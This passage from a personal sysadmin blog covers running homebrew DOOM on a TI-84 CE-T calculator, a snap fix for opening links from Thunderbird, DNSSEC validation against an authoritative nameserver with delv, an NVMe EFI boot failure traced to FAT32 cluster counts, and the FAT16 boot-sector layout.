Added diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 to ssholdhw which was needed for some machines.

2022-07-10 - ti-84 ce-t / asm / ubuntu / doom

Prerequisites for loading games and other binaries in the Texas Instruments TI-84 CE-T Python Edition using Ubuntu/Jammy.

Apparently Texas Instruments has decided that we're not allowed to run binaries on the Graphing Calculator anymore. I remember that we used to be able to run a Mario game clone on the TI-83 back in the nineties. This feature has now been locked down, removing the Asm() call from the function catalog.

Naturally we had to have a — really limited PoC — DOOM on the calculator anyway, so some steps had to be performed:

  • charge up the TI-84 with the provided mini-USB cable;
  • install tilp2 — straight from the jammy/universe;
  • add udev rules at /etc/udev/rules.d/69-libticables.rules:
    ACTION!="add", GOTO="libticables_end"
    
    # serial device (assume TI calculator)
    KERNEL=="ttyS[0-3]", ENV{ID_PDA}="1"
    # parallel device (assume TI calculator)
    SUBSYSTEM=="ppdev", ENV{ID_PDA}="1"
    # SilverLink
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e001", ENV{ID_PDA}="1"
    # TI-84+ DirectLink
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e003", ENV{ID_PDA}="1"
    # TI-89 Titanium DirectLink
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e004", ENV{ID_PDA}="1"
    # TI-84+ SE DirectLink
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e008", ENV{ID_PDA}="1"
    # TI-Nspire DirectLink
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e012", ENV{ID_PDA}="1"
    # Lab Cradle / Datatracker Cradle
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e01c", ENV{ID_PDA}="1"
    # TI-Nspire CX II
    SUBSYSTEM=="usb", ATTR{idVendor}=="0451", ATTR{idProduct}=="e022", ENV{ID_PDA}="1"
    
    LABEL="libticables_end"
    
  • reload udev using udevadm trigger;
  • start tilp2 and check that it communicates with the TI-84 — for instance by making a backup (it's a zip file);
  • download Cabri™ Jr. App for TI-84 Plus CE/T Family (CabriJr_CE.8ek);
  • download arTIfiCE.8xv (see HOWTO);
  • download your favorite game(s), or clibs.8xg and DOOM.8xp;
  • upload the bunch to the TI-84, using tilp2 and the Send File function;
  • start Cabri from the App menu, go to Open and run arTIfiCE;
  • there, you should be greeted with a new menu that lists the installed game(s).

Adding the Cesium shell felt like overkill. It looks nice, but exiting it was not obvious (the Clear button?), and we mainly want to use the calculator for its intended purposes.

2022-05-08 - thunderbird / opening links / ubuntu

For some reason, opening links from Thunderbird stopped working. When clicking a URL, I expected Chromium to open the website, but nothing happened.

After visiting a few bug reports and the Thunderbird advanced configuration, I turned my attention to xdg-open:

$ xdg-open 'https://wjd.nu'
ERROR: not connected to the gnome-3-38-2004 content interface.

Okay. So it wasn't a Thunderbird problem at all.

The culprit was that I had been doing some housekeeping in snap. (I could fill a rant about what I dislike about snap/snapcraft, by the way: silent automatic updates (you can only make it non-silent but still automatic), lots of squashfs mounts/directory entries when not used (why not mount on application startup?), recurring broken fonts, flaky GNOME integration, not enough revisions accessible to go back to a working version, and those are merely UX complaints. Trying to fix a broken snap is near impossible (first verify, but then what?), while with apt-get source + dpkg-buildpackage you can rebuild a modified package in minutes. And then I didn't even bring up the controversy of why there is only one snap store, on which I — for once — do not have a strong opinion.)</rant>

Fixing the opening of links was a matter of:

$ snap install gnome-3-38-2004
gnome-3-38-2004 0+git.1f9014a from Canonical✓ installed

And now opening links works again. I have no idea why I need an extra 260MiB just to be able to open links. We can chalk it up to “another great advantage of snap”.

$ df -h | grep gnome
/dev/loop10  163M 163M 0 100% /snap/gnome-3-28-1804/145
/dev/loop32  165M 165M 0 100% /snap/gnome-3-28-1804/161
/dev/loop0   249M 249M 0 100% /snap/gnome-3-38-2004/99

Sigh..

Update 2022-08-27

The most prominent list of why Snapcraft/snap is One Giant Disappointment in 2022:

Apart from the actual bugs, they boil down to losing control on your own Linux system: losing control of building/rebuilding of packages; losing control of when/how to update; losing control over permissions through the extra sandboxing.

2022-03-24 - dnssec validation / authoritative server

The delv(1) tool is the standard way to validate DNSSEC signatures. By default it will validate up to the DNS root zone, for which it knows and trusts the DNSKEY. If you want to validate only a part of a chain, you'll need to know a few things.

Regular DNSSEC validation

Using delv is normally as simple as this:

$ delv -t A @1.1.1.1 dnssec.works.
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88
dnssec.works.   3600  IN  RRSIG A 8 2 3600 20220408113557 20220309112944 63306 dnssec.works. O+...

(1.1.1.1 is the IP of Cloudflare's free recursive resolver. If you don't know the difference between a recursive and authoritative DNS server, you may want to look that up now.)

For unsigned hostnames:

$ delv -t A @1.1.1.1 apple.com.
; unsigned answer
apple.com.    900 IN  A 17.253.144.10

And for badly signed hostnames:

$ delv -t A @1.1.1.1 fail01.dnssec.works.
;; resolution failed: SERVFAIL

(The DNSSEC signature for fail01.dnssec.works. hostname is invalid by design. This aids in testing.)

Sidenote: we add the period (".") to the end of the hostname so additional domain searches are not tried — see domain or search in /etc/resolv.conf. Without it, a system resolver might also try apple.com.yourdomain.tld.

Trace DNS lookups with dig

When using dig with +trace, we can see how a lookup would be performed by a recursing DNS server (like 1.1.1.1).

$ dig -t A fail01.dnssec.works. +trace
...
.                       6875  IN  NS  k.root-servers.net.
...
works.                172800  IN  NS  v0n3.nic.works.
...
dnssec.works.           3600  IN  NS  ns5.myinfrastructure.org.
...
fail01.dnssec.works.    3600  IN  A 5.45.109.212

As you can see, dig will not do DNSSEC validation. The recursor (at 1.1.1.1) does though. It rightly responded with a SERVFAIL because there is something wrong.

In this case, the problem being that a DS record for the hostname exists but the nameserver did not provide an RRSIG at all:

$ dig -t DS @ns5.myinfrastructure.org. fail01.dnssec.works. +short
41779 8 2 A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611 A1D29DE1
$ dig -t A @ns5.myinfrastructure.org. fail01.dnssec.works. +dnssec |
    awk '{if($4=="RRSIG"&&$5=="A")print}'
(no response)

Trace DNS lookups with delv

So, how does delv do this validation?

For a valid hostname, things look like this:

$ delv -t A @1.1.1.1 dnssec.works. +rtrace
;; fetch: dnssec.works/A
;; fetch: dnssec.works/DNSKEY
;; fetch: dnssec.works/DS
;; fetch: works/DNSKEY
;; fetch: works/DS
;; fetch: ./DNSKEY
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88

delv does not ask any nameserver other than the supplied server. But it will ask that server for all the information needed to verify the hostname signatures.

From the output above, we see that the validation happens bottom-up (contrary to a DNS query which happens top-down): we get a record, look for the DNSKEY, look for the DS, get the next DNSKEY, etc., all the way to the root DNSKEY.

If we try this on an authoritative nameserver — one that explicitly does not recurse — we'll get an error.

$ dig -t NS @1.1.1.1 dnssec.works. +short
ns3.myinfrastructure.org.
ns5.myinfrastructure.org.
$ dig -t A @1.1.1.1 ns3.myinfrastructure.org. +short
5.45.109.212

(We looked up the IP 5.45.109.212 of the authoritative nameserver manually, so as not to clutter the following output.)

$ delv -t A @5.45.109.212 dnssec.works.
;; chase DS servers resolving 'dnssec.works/DS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving 'works/NS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving './NS/IN': 5.45.109.212#53
;; REFUSED unexpected RCODE resolving 'works/DS/IN': 5.45.109.212#53
;; no valid DS resolving 'dnssec.works/DNSKEY/IN': 5.45.109.212#53
;; broken trust chain resolving 'dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: broken trust chain

As promised, an error.

The nameserver at 5.45.109.212 (that knows dnssec.works.) refuses to answer requests for which it is not the authority: in this case the DS record, which is supposed to be in the parent zone. That is correct behaviour. But that is annoying if we want to test the validity of records returned by an authoritative nameserver. Can we work around that?

Creating the delv anchor-file

As we saw above, delv validation starts by looking up the DNSKEY and DS records for the hostname. Your authoritative nameserver will have the DNSKEY, but not the DS record(s):

$ dig -t A @5.45.109.212 dnssec.works. +short
5.45.107.88
$ dig -t DNSKEY @5.45.109.212 dnssec.works. +short
257 3 8 AwEAAePcoDyvYNNO/pM4qLxDQItc...
$ dig -t DS @5.45.109.212 dnssec.works.
...
;; WARNING: recursion requested but not available

The DS record can be found at the nameserver of the parent zone:

$ dig -t NS @1.1.1.1 works. +short
v0n0.nic.works.
$ dig -t DS @v0n0.nic.works. dnssec.works. +short
41779 8 2 A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611 A1D29DE1

As expected, there it is.

So, in order for us to validate only the behaviour/responses of the 5.45.109.212 nameserver, we have to "pre-load" the DS key. We'll whip up a small shell script for that:

make_trust_anchors() {
    local recursor='1.1.1.1'
    local awk='{printf "  \"%s\" %s %s %s %s \"%s\";\n",D,N,$1,$2,$3,$4}'
    echo "trust-anchors {"
    for name in "$@"; do
        # DNSKEY: Contains the public key that a DNS
        # resolver uses to verify DNSSEC signatures
        # in RRSIG records.
        delv -t DNSKEY @$recursor "${name%.}." +short +split=0 |
          awk -vD="${name%.}." -vN=static-key "/^257 /$awk"
        # DS: Holds the name of a delegated zone.
        # References a DNSKEY record in the sub-delegated
        # zone. The DS record is placed in the parent
        # zone along with the delegating NS records.
        delv -t DS @$recursor "${name%.}." +short +split=0 |
          awk -vD="${name%.}." -vN=static-ds "$awk"
        # (delv requires one of the above)
    done
    echo "};"
}

(By using delv to look up the DNSKEY and DS, we even validate those against our trusted root zone key.)

If we run that snippet, we see this:

$ make_trust_anchors dnssec.works.
trust-anchors {
  "dnssec.works." static-key 257 3 8 "AwEAAa+YwrBlCwfJzwmsSK87hKFAm+yz03z5pZwZWpMRJu33+GQLswgZJJX/iOTcjwHdpQXvbAHwNhLtTJ1Pp46b55Q8+zH7DkvqQAJyDTfjVXEyX/745e/5CCPAkVGnaZihj9jqichokDfWkAOJvGxqg9HdqsLmXH3a2GrxFfvwsdSPuBwQmSVzURIyZMMxRC+GH2B+ADGWxJNvrspS0lf9svfkrdMvG4hjLhwNViDSjdx9yb4yRH/+TgvTAkYS/6iB8FLBKnltYtsXuveovKp9Dwq+xllqvUQTkRK90aUQEQa8G8ukecJbIliCrPJH7JK2IaDX8ezoYZ4QMZPc2y/K8FHK0G7EVDcgwskGj/NdfEHUuBdw+Vr9eHu8x6aoU/tnTRI7qI2HmCUqcVLSEGJAmKu4A7lqVP2Xw6cpROGviS6Z";
  "dnssec.works." static-ds 41779 8 2 "A73A4215B94FD90C2E6B94BD0513C7A82C4A1E592FD686420573E611A1D29DE1";
};

And — using Bash process substitution — we can feed that output to delv:

$ delv -t A @5.45.109.212 dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
; fully validated
dnssec.works.   3600  IN  A 5.45.107.88
dnssec.works.   3600  IN  RRSIG A 8 2 3600 20220408113557 20220309112944 63306 dnssec.works. O++...

Cool. Now we can ask an authoritative server and validate its response.

NOTE: You do need bind9-dnsutils 9.16 or newer for this to work. Otherwise you'll get an unknown option 'trust-anchors' error.
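
A quick way to check what you have:

$ delv -v
(this prints the delv/BIND version, e.g. delv 9.18.x)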

Validating authoritative server responses with an anchor-file

Using the make_trust_anchors snippet works for all subdomains served by the same DNS server:

$ delv -t A @5.45.109.212 www.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
; fully validated
www.dnssec.works. 3600  IN  A 5.45.109.212
www.dnssec.works. 3600  IN  RRSIG A 8 3 3600 20220420081240 20220321074251 63306 dnssec.works. 2Pq...

Let's check the invalid one:

$ delv -t A @5.45.109.212 fail01.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
;; insecurity proof failed resolving 'fail01.dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: insecurity proof failed

Or another invalid one:

$ delv -t A @5.45.109.212 fail02.dnssec.works. \
    -a <(make_trust_anchors dnssec.works.) \
    +root=dnssec.works.
;; validating fail02.dnssec.works/DNSKEY: verify failed due to bad signature (keyid=2536): RRSIG has expired
;; validating fail02.dnssec.works/DNSKEY: no valid signature found (DS)
;; no valid RRSIG resolving 'fail02.dnssec.works/DNSKEY/IN': 5.45.109.212#53
;; broken trust chain resolving 'fail02.dnssec.works/A/IN': 5.45.109.212#53
;; resolution failed: broken trust chain

The purpose

Why would you do this?

For one, out of curiosity. But if you're moving your DNS data to a new authoritative server, it is wise to confirm that the signatures are still correct.

2022-03-10 - nvme drive refusing efi boot

UEFI is the current boot standard. Instead of fighting it, we've adopted it as the default for all hardware machines we install. We've had some issues in the past, but they could all be attributed to a lack of knowledge on the operator's part, not to a problem with EFI itself. But this time we couldn't figure out why the SuperMicro machine refused to boot from these newly installed EFI partitions: no bootable UEFI device found.

Spoiler: it was an improperly formatted FAT32 filesystem, but we'll get to that in a moment.

Setting up storage on new machines

When setting up new hardware, we use a script that partitions and formats drives per our needs. For NVMe drives, we must however first select the logical sector size. By default these drives are in 512-byte compatibility mode. For their performance and lifespan, it's better to choose their native sector size, which is usually 4096 bytes.

Doing that, looks somewhat like this:

DEV=/dev/nvme0n1
# List possible lba formats. The output might
# look like this, where lower rp is better:
# ...
# lbaf  0 : ms:0   lbads:9  rp:0x2 (in use)
# lbaf  1 : ms:8   lbads:9  rp:0x2
# lbaf  2 : ms:16  lbads:9  rp:0x2
# lbaf  3 : ms:0   lbads:12 rp:0
# lbaf  4 : ms:8   lbads:12 rp:0
# lbaf  5 : ms:64  lbads:12 rp:0
# lbaf  6 : ms:128 lbads:12 rp:0
nvme id-ns $DEV
# Select 4096 (1<<12) bytes per cluster:
nvme format --lbaf=3 $DEV

(Once it's set, one can check that it's optimal by running nvme_check_best_sector() in sadfscheck.)

Next up, is partitioning:

# First usable sector is 34 (with 512B sectors; 6 with 4096B), we skip the entire first MB.
sgdisk -n1:1M:+1M  -t1:EF02 -c1:biosboot $DEV   # BIOS-boot, or
sgdisk -n2:0:+510M -t2:EF00 -c2:efi      $DEV   # EFI System
sgdisk -n3:0:+1G   -t3:8300 -c3:boot     $DEV   # /boot (type 8300 for Linux, or BE01 for ZFS)
sgdisk -n4:0:0     -t4:8300 -c4:root     $DEV   # /

Adding a small 1 MiB partition allows us to fall back to old style BIOS-boot. But commonly the real booting happens off the second partition, which is 510 MiB large: more than sufficient for any EFI binaries we may need.
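
To double-check the resulting layout before formatting, sgdisk can print the partition table:

sgdisk -p $DEV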

Formatting the filesystems:

mkfs.fat -F 32 -n EFI ${DEV}p2  # (*BAD)
mkfs.ext2 -t ext2 -L boot ${DEV}p3  # or something else for ZFS
mkfs.ext4 -t ext4 -L root ${DEV}p4  # or something else for ZFS

At this point, we let debootstrap(8) work its magic. And after some waiting and some finalizing, we have a bootable Ubuntu/Linux system.

Mirror disks and booting

For the boot/root filesystems, we generally want a mirror setup, so a disk failure isn't an immediate catastrophe. We use either ZFS mirrors or Linux Software RAID for this. The mirroring components make sure that the partitions on either drive are redundant and interchangeable. This ensures that if one drive completely fails, we can still boot from the other.

Except for that EFI partition... Because it has a FAT filesystem... And it therefore does not do any fancy mirroring.

Luckily, we got that sorted quite easily using efibootmirrorsetup — a helper script that keeps the two EFI partitions in sync, and places the EFI partitions of both drives first in the BootOrder.

Running it is as easy as calling efibootmirrorsetup with the two mirror drives as arguments:

efibootmirrorsetup /dev/nvme0n1 /dev/nvme1n1

It's an interactive tool, which won't do anything without your permission. With your permission, it formats the EFI partition on the second drive with a FAT filesystem and ensures that grub(8) updates are always applied to both partitions.

EFI set up correctly

At this point, we should have everything set up correctly:

# efibootmgr
BootCurrent: 0004
Timeout: 1 seconds
BootOrder: 0004,0000,0002,0001
Boot0000* nvme-KCD6DLUL1T92_61A
Boot0001  Network Card
Boot0002* UEFI: Built-in EFI Shell
Boot0004* nvme-KCD6DLUL1T92_41E

Two boot images have been prepended to the BootOrder. efibootmirrorsetup has been kind enough to use the device name/serial so you can easily identify and select a non-faulty drive in case of hardware failures.

Looking at efibootmgr -v also shows the drive and file:

HD(2,GPT,df57901e-9a47-4393-9470-94afaa56a58f,0x200,0x1fe00)/File(\EFI\UBUNTU\SHIMX64.EFI)

The values listed are:

  • 2 = partition number
  • GPT = the partitions follow GUID Partition Table (GPT) layout
  • df57901e-9a47-4393-9470-94afaa56a58f = the partition UUID (see also: blkid)
  • 0x200 = the EFI filesystem starts at the 512th sector (at 2 MiB when using 4 KiB sectors)
  • 0x1fe00 = the filesystem fits on 130560 sectors (510 MiB, when using 4 KiB sectors)
  • File(\EFI\UBUNTU\SHIMX64.EFI) = path to the boot loader
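
That partition UUID can be cross-checked from Linux (assuming here that the EFI partition is at /dev/nvme0n1p2):

# blkid -o value -s PARTUUID /dev/nvme0n1p2
df57901e-9a47-4393-9470-94afaa56a58f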

No EFI filesystem found

Yet, when rebooting, we found ourselves dropped into a UEFI shell. Suddenly the setup that had worked previously did not work.

If you're new to the EFI shell, it feels both cryptic and old fashioned. The most important tip I have for you is -b for pagination:

Shell> help -b
...
(listing of all available commands, paginated)
Shell> help -b map
...
(listing help for map, showing among others "map fs*")
Shell> map -b
...
     BLK0: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)
         Handle:      [1D2]
         Media Type:  Unknown
         Removable:   No
         Current Dir: BLK0:
     BLK1: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(1,GPT,243727B8-73F9-41C9-8D06-70EB75472690,0x100,0x100)
         Handle:      [1D3]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK1:
     BLK2: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(2,GPT,DF57901E-9A47-4393-9470-94AFAA56A58F,0x200,0x1FE00)
         Handle:      [1D4]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK2:
     BLK3: Alias(s):
          PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(3,GPT,2AD728A8-2142-43F0-8FB7-54B399B2AEB6,0x20000,0x40000)
         Handle:      [1D5]
         Media Type:  HardDisk
         Removable:   No
         Current Dir: BLK3:
...

There they were, the partitions, and particularly that BLK2. But there should be more than just partitions. There should also be filesystems, denoted by FSn.

(For a brief moment, I entertained the thought that UEFI couldn't cope with 4096 byte sector sizes, but that would be too improbable. Larger sector sizes had existed long before the UEFI standard was drafted.)

I messed around quite a bit in the UEFI shell. Listing hex dumps of BLK2 (dblk), displaying the current boot config (bcfg boot dump) and so forth.

Sidenote: the interactive hex editor (hexedit) on the Intel platform said Ctrl-E for help. But Ctrl-E did nothing. Function keys did work: F1 = jump to offset, F2 = save, F3 = exit, ..., F7 = paste, F8 = open, F9 = block open. You may be most interested in "exit". I was ;-)

After giving in to the improbable hunch that large sectors were the culprit, I created an EFI partition with a 512 byte sector size. Booting worked again! There definitely was something going on with the sector size.

Here is output of EFI subsystem handles, where one filesystem (with 512 byte sectors) worked, and one (with 4096 byte sectors) did not:

Shell> dh -p diskio
...
1FE: SimpleFileSystem DiskIO EFISystemPartition PartitionInfo BlockIO DevicePath(..6AB46D5FA0DF,0x1000,0xFF000))
...
203: DiskIO EFISystemPartition PartitionInfo BlockIO DevicePath(..-94AFAA56A58F,0x200,0x1FE00))
...

Observe how the second one does not list the SimpleFileSystem. (As we've seen earlier, 0x1000 and 0x200 are the sector offsets. For the 4096 byte sector size, the offset is lower, but points to the same byte offset.)
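
The two offsets indeed resolve to the same byte position:

$ echo $((0x1000 * 512)) $((0x200 * 4096))
2097152 2097152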

And, even more verbosely:

Shell> dh 1FE -v
1FE: 85F2A898
SimpleFileSystem(85F0B030)
DiskIO(85F297A0)
EFISystemPartition(0)
PartitionInfo(85F2A368)
  Partition Type       : GPT
  EFI System Partition : Yes
BlockIO(85F2A2B0)
  Fixed MId:0 bsize 200, lblock FEFFF (534,773,760), partition rw !cached
DevicePath(85F2AB18)
  PciRoot(0x0)/Pci(0x1,0x1)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FF-A1-C1-07)/HD(2,GPT,DFE346BA-05A8-4B9C-A6D2-6AB46D5FA0DF,0x1000,0xFF000)
Shell> dh 203 -v
203: 85EEF718
DiskIO(85EA57A0)
EFISystemPartition(0)
PartitionInfo(85EEF368)
  Partition Type       : GPT
  EFI System Partition : Yes
BlockIO(85EEF2B0)
  Fixed MId:0 bsize 1000, lblock 1FDFF (534,773,760), partition rw !cached
DevicePath(85EEFC98)
  PciRoot(0x0)/Pci(0x1,0x2)/Pci(0x0,0x0)/NVMe(0x1,00-01-0D-91-FE-A2-C1-08)/HD(2,GPT,DF57901E-9A47-4393-9470-94AFAA56A58F,0x200,0x1FE00)

(At this point you may be wondering how I got these screen dumps. The UEFI shell was on a remote SuperMicro machine connected over IPMI using iKVM, an ancient Java application which does not support screen grabbing at all. The answer: I wrote a quick OCR tool for this purpose, ikvmocr, which converts screenshots of a console to text. It depends on Python PIL only, and is more than 99% accurate.)

FAT versions

Yesterday, I wrote about the FAT16 filesystem layout for this reason.

When creating the tools that set up EFI partitions, I had incorrectly assumed that FAT32 was the default nowadays. It is not. The appropriate FAT version for your needs depends on the size of the partition and the desired cluster size.

And due to a bug in dosfstools 4.1 (and older), we were creating too few clusters on the FAT32 partition when the drives had 4096 byte sectors ("This only works correctly for 512 byte sectors!"). These partitions would work just fine on Linux as it uses different heuristics to detect the FAT version. But the EFI SimpleFileSystem Driver would use the official recommendation, detecting FAT16 and then not recognising the rest of the filesystem, dropping it from the possible boot options.

The (official) rules: begin by taking the (data) sector count, which is slightly less than the total partition size divided by the sector size in bytes. Thus, take 510 MiB, divide by the 4096 byte sector size, and get 130,560 sectors. Divide that by the sectors per cluster, commonly 2 or 4 (use file -s if you don't know). Now you have 65,280 or 32,640 clusters (slightly less, actually).
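
In shell arithmetic, the 4096 byte sector case from above:

$ echo $(( 510 * 1024 * 1024 / 4096 ))  # data sectors (roughly)
130560
$ echo $(( 130560 / 2 ))                # clusters at 2 sectors per cluster
65280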

Then, check this table:

clusters   FAT version
< 4,085    FAT12
< 65,525   FAT16 (both 65,280 and 32,640 are here)
>= 65,525  FAT32

For the smaller 512 byte sector size, mkfs.fat would have selected 16 sectors per cluster: 510 MiB / 512 / 16 also yields 65,280 clusters, except if you selected FAT32, in which case it would lower the sectors per cluster so the cluster count would exceed 65,525. For the larger sector size, this calculation was not performed correctly.

Lessons learnt: don't use FAT32 for partitions smaller than 1 GiB unless you also check the sectors-per-cluster.

Addendum (2022-03-24)

The UEFI Spec states in 13.3 File System Format that “EFI encompasses the use of FAT32 for a system partition, and FAT12 or FAT16 for removable media.” That suggests using FAT32 (and many websites out there suggest the same). However, the specification also mandates support for the other FAT versions.

Most important is that the partition is aligned on the (larger of the logical or physical) sector size. If you opt to run with FAT32, make sure the sectors per cluster value is low enough, so you get at least 65,525 clusters: for 4 KiB clusters you'll need at least 256.5 MiB (*), for 8 KiB clusters at least 512.5 MiB (**).

(*) 2*4096 (reserved) + 2*256*1024 (2xFAT32) + 4096*65525 (data)
(**) 2*4096 (reserved) + 2*256*1024 (2xFAT32) + 8192*65525 (data)
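
A quick sanity check of those two minimums (a throwaway snippet; rounding up yields the 256.5 and 512.5 MiB figures above):

for cluster_size in (4096, 8192):
    minimum = 2 * 4096 + 2 * 256 * 1024 + cluster_size * 65525
    print('%d byte clusters: %.2f MiB' % (cluster_size, minimum / 2**20))
# 4096 byte clusters: 256.46 MiB
# 8192 byte clusters: 512.42 MiB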

2022-03-09 - fat16 filesystem layout

First there was FAT, then FAT12, FAT16 and finally FAT32. Inferior filesystems nowadays, but nevertheless both ubiquitous and mandatory for some uses. And sometimes you need to be aware of the differences.

A short breakdown of FAT16 follows — we'll skip the older FAT as well as various uncommon settings, because those are not in active use.

Sector size

The storage device defines (logical) sector sizes. This used to be 512 bytes per sector for a long time (we're skipping pre-hard disk tech), but this is now rapidly moving to 4096 bytes per sector on newer SSD and NVMe drives. Both the partition table and the filesystems record this size somewhere.

Boot sector

The first sector of FAT16 (or any other FAT version for that matter) holds the boot sector. How long that sector is depends on the sector size (commonly 512 or 4096 bytes). At offset 0x00B, two bytes hold the bytes per sector: commonly 00 02 (512, little endian) or 00 10 (4096, little endian).

At 0x00D, one byte holds the sectors per cluster. This must be a power of two (1, 2, 4, ...). In the data area of the filesystem, files are accessed by cluster number. A cluster can hold at most one chunk of a single file. If the number of bytes per cluster is large, you'll waste space when you have many small files. Conversely, if you have only large files, you can choose larger and fewer clusters, making the allocation tables more efficient.

Let's look at the hex dump of a cleanly initialized FAT filesystem. We'll compare FAT16 created with 512 byte sectors against FAT16 with 4096 byte sectors. You can reproduce this by running dd if=/dev/zero of=fat16.img bs=1M count=510 to create an empty 510 MiB image, and then mkfs.fat -F 16 -S 512 -s 16 fat16.img or mkfs.fat -F 16 -S 4096 -s 2 fat16.img to make a filesystem on it. (-S defines the sector size, -s the sectors per cluster.)

--- fat16-512
+++ fat16-4096
@@ -1,3 +1,3 @@
-00000000  eb 3c 90 6d 6b 66 73 2e  66 61 74 00 02 10 10 00  |.<.mkfs.fat.....|
+00000000  eb 3c 90 6d 6b 66 73 2e  66 61 74 00 10 02 02 00  |.<.mkfs.fat.....|
-00000010  02 00 02 00 00 f8 00 01  20 00 40 00 00 00 00 00  |........ .@.....|
+00000010  02 00 02 00 00 f8 20 00  20 00 40 00 00 00 00 00  |...... . .@.....|
-00000020  00 f0 0f 00 80 00 29 ff  fc 1e d8 4e 4f 20 4e 41  |......)....NO NA|
+00000020  00 fe 01 00 80 00 29 77  4c de d8 4e 4f 20 4e 41  |......)wL..NO NA|
...
 *
 00002000  f8 ff ff ff 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 00002010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00022000  f8 ff ff ff 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 00022010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...

Indeed, we see 00 02 versus 00 10 for the bytes per sector, and 10 (16) versus 02 (2) for sectors per cluster. The cluster size is 8192 for both: 512 * 0x10 or 4096 * 0x2.

Next, at 0x00E, is the count of reserved sectors. mkfs.fat(8) defaults this to the same number as the sectors per cluster. (Also 8192 bytes.)

Then, at 0x010, there's the count of FATs — that is, the File Allocation Tables, the tables that hold linked lists of cluster positions, specifying in which clusters a file resides. This is always 2, i.e. two copies, for redundancy.

At 0x013, two bytes hold the total logical sectors (not valid for FAT32) or 0, in which case a four byte value is at 0x020. Here we see 00 f0 0f 00 (1044480 sectors) and 00 fe 01 00 (130560 sectors) respectively. For a 510 MiB filesystem this is indeed correct.

And at 0x016 we see 00 01 (256) or 20 00 (32) sectors per FAT. In both cases 128 KiB.

After the boot sector

After the reserved sectors (only the boot sector for FAT16), 8 KiB in this case, there are the two FATs (2 * 128 KiB) and finally the data.

Directory entries (containing filenames and pointers into the FAT) are special types of files. For FAT16, the root directory entry is actually at a fixed position (after the last FAT), with at most 512 32-byte entries (the 00 02 seen at 0x011). Subdirectory entries are located in the data area, just like regular files.
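
To tie these offsets together, here's a minimal boot sector parser in Python (a sketch, assuming the fat16.img created earlier; all fields are little endian):

import struct

def parse_fat16_bootsector(fp):
    """Extract the boot sector fields discussed above."""
    bs = fp.read(512)  # the interesting fields fit in the first 512 bytes
    bytes_per_sector, sectors_per_cluster, reserved_sectors = (
        struct.unpack_from('<HBH', bs, 0x00B))
    fat_count, root_entries, total_sectors16 = (
        struct.unpack_from('<BHH', bs, 0x010))
    sectors_per_fat, = struct.unpack_from('<H', bs, 0x016)
    total_sectors32, = struct.unpack_from('<I', bs, 0x020)
    return {
        'bytes_per_sector': bytes_per_sector,
        'sectors_per_cluster': sectors_per_cluster,
        'reserved_sectors': reserved_sectors,
        'fat_count': fat_count,
        'root_entries': root_entries,
        'sectors_per_fat': sectors_per_fat,
        'total_sectors': total_sectors16 or total_sectors32,
    }

with open('fat16.img', 'rb') as fp:
    print(parse_fat16_bootsector(fp))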

Taking the values from above, the filesystem layout looks like this (for 512-bytes per sector and 4096-bytes per sector respectively):

offset    size     calc. 512  calc. 4K  name
0x00000   0x2000   16*512     2*4096    reserved sectors, including boot sector
0x02000   0x20000  256*512    32*4096   1st FAT
0x22000   0x20000  256*512    32*4096   2nd FAT
0x42000   0x4000   512*32     512*32    root directory area
0x46000   0x4000   2*8192     2*8192    data area, cluster 0 (boot code) + cluster 1
0x4a000   (clusters-2) * bytes_per_cluster    data area, files and subdirectory entries

Total number of clusters

Computing the number of clusters in the data area is done by taking the total number of sectors (from 0x013 or 0x020), subtracting the reserved sectors (see 0x00E), FAT sectors (from 0x016) and root directory (32 and 4 sectors respectively), and dividing, rounding down, by the number of sectors in a cluster (at 0x00D).

For the 512 byte sector filesystem above, that means:
floor((1044480 - 16 - 2*256 - 32) / 16) = 65245 clusters (509.7 MiB)

For the 4096 byte sector filesystem above, that means:
floor((130560 - 2 - 2*32 - 4) / 2) = 65245 clusters (509.7 MiB)
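
Or, as a throwaway Python function (field names as in the parser sketch above):

def cluster_count(total_sectors, reserved_sectors, fat_count,
                  sectors_per_fat, root_entries,
                  bytes_per_sector, sectors_per_cluster):
    root_sectors = root_entries * 32 // bytes_per_sector
    data_sectors = (total_sectors - reserved_sectors
                    - fat_count * sectors_per_fat - root_sectors)
    return data_sectors // sectors_per_cluster

print(cluster_count(1044480, 16, 2, 256, 512, 512, 16))  # 65245
print(cluster_count(130560, 2, 2, 32, 512, 4096, 2))     # 65245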

Which FAT version are we dealing with?

